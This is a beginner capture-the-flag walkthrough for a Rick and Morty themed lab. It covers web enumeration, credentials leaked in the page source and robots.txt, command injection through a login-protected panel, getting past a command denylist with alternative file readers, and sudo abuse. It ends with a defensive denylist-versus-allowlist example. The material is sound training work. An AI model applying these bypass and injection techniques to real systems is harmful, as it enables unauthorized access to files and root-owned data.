Pickle Rick

Beginner | 35 min | Writeup

Help Rick find his ingredients

Learning Objectives

  • Enumerate the web app
  • Find credentials
  • Exploit web vulnerabilities
  • Find all ingredients

Pickle Rick is a Rick and Morty themed CTF where you help Rick find three secret ingredients. It teaches web enumeration, command injection, and basic Linux navigation.

Walkthrough

bash
# Step 1: Scan and Web Enum
nmap -sV TARGET_IP
# Port 80 HTTP

# View page source (-E so that | is treated as alternation)
curl http://TARGET_IP | grep -iE "comment|username|password"
# Found comment: Username: R1ckRul3s

# Check robots.txt
curl http://TARGET_IP/robots.txt
# Contains: Wubbalubbadubdub (password!)

# Step 2: Directory Enumeration
gobuster dir -u http://TARGET_IP -w /usr/share/wordlists/dirb/common.txt
# Found: /login.php

# Step 3: Login
# Username: R1ckRul3s
# Password: Wubbalubbadubdub

# Step 4: Command Injection
# The portal has a command panel!
# Commands are executed on the server

# First ingredient (in current dir)
ls
# Found: Sup3rS3cretPickl3Ingred.txt

# Some commands are blocked (cat, head, tail)
# Use alternatives:
less Sup3rS3cretPickl3Ingred.txt
# Or: grep . Sup3rS3cretPickl3Ingred.txt
# First ingredient found!

# Step 5: Find Second Ingredient
ls /home
# Found: rick, ubuntu

ls /home/rick
# Found: second ingredients

less "/home/rick/second ingredients"
# Second ingredient found!

# Step 6: Find Third Ingredient
# Check sudo permissions
sudo -l
# User can run ALL commands!

sudo ls /root
# Found: 3rd.txt

sudo less /root/3rd.txt
# Third ingredient found!

Bypass Command Filters

When cat is blocked, try: less, more, head, tail, grep, awk, sed, strings, xxd, base64, or even python/php to read files.
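
From the defender's side, the filter above fails because it is a denylist: it names a few bad words and lets everything else through. The sketch below is an added example, not the CTF portal's code. The DENYLIST contents follow the walkthrough, while ALLOWED_ACTIONS, the function names and the sample inputs are assumptions constructed for illustration.

```python
import shlex

# Constructed denylist modelled on the filter the walkthrough describes
# (cat, head and tail blocked); not the portal's actual code.
DENYLIST = {"cat", "head", "tail"}

# Assumed allowlist for a hypothetical diagnostics panel:
# action name -> fixed argv, to be run with subprocess.run(argv, shell=False).
ALLOWED_ACTIONS = {
    "uptime": ["uptime"],
    "disk": ["df", "-h"],
}

def denylist_permits(command: str) -> bool:
    """Weak check: reject only when a denylisted word appears in the input."""
    return not any(word in command for word in DENYLIST)

def allowlist_resolve(command: str):
    """Strong check: return the fixed argv for a known action, else None.

    The user's text only selects an entry; it never reaches a shell.
    """
    try:
        tokens = shlex.split(command)
    except ValueError:  # unbalanced quotes
        return None
    if len(tokens) != 1:  # no arguments, no chaining
        return None
    argv = ALLOWED_ACTIONS.get(tokens[0])
    return list(argv) if argv else None

# Constructed inputs: the commands used in the walkthrough plus one legitimate action.
SAMPLES = [
    "cat Sup3rS3cretPickl3Ingred.txt",
    "less Sup3rS3cretPickl3Ingred.txt",
    "grep . Sup3rS3cretPickl3Ingred.txt",
    'less "/home/rick/second ingredients"',
    "sudo less /root/3rd.txt",
    "disk",
]

def compare(samples=SAMPLES):
    """Return (input, passes_denylist, passes_allowlist) for each sample."""
    return [(s, denylist_permits(s), allowlist_resolve(s) is not None) for s in samples]

if __name__ == "__main__":
    for cmd, deny_ok, allow_ok in compare():
        print(f"{cmd!r:45} denylist={'pass' if deny_ok else 'block'} "
              f"allowlist={'pass' if allow_ok else 'block'}")
```

Only the `cat` line is stopped by the denylist; the allowlist rejects every walkthrough command and accepts only the named action.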

Knowledge Check

Where was the username found?

Key Takeaways

  • Always view page source and check for comments
  • robots.txt can contain sensitive information
  • When commands are blocked, use alternatives
  • sudo -l can reveal overly permissive configurations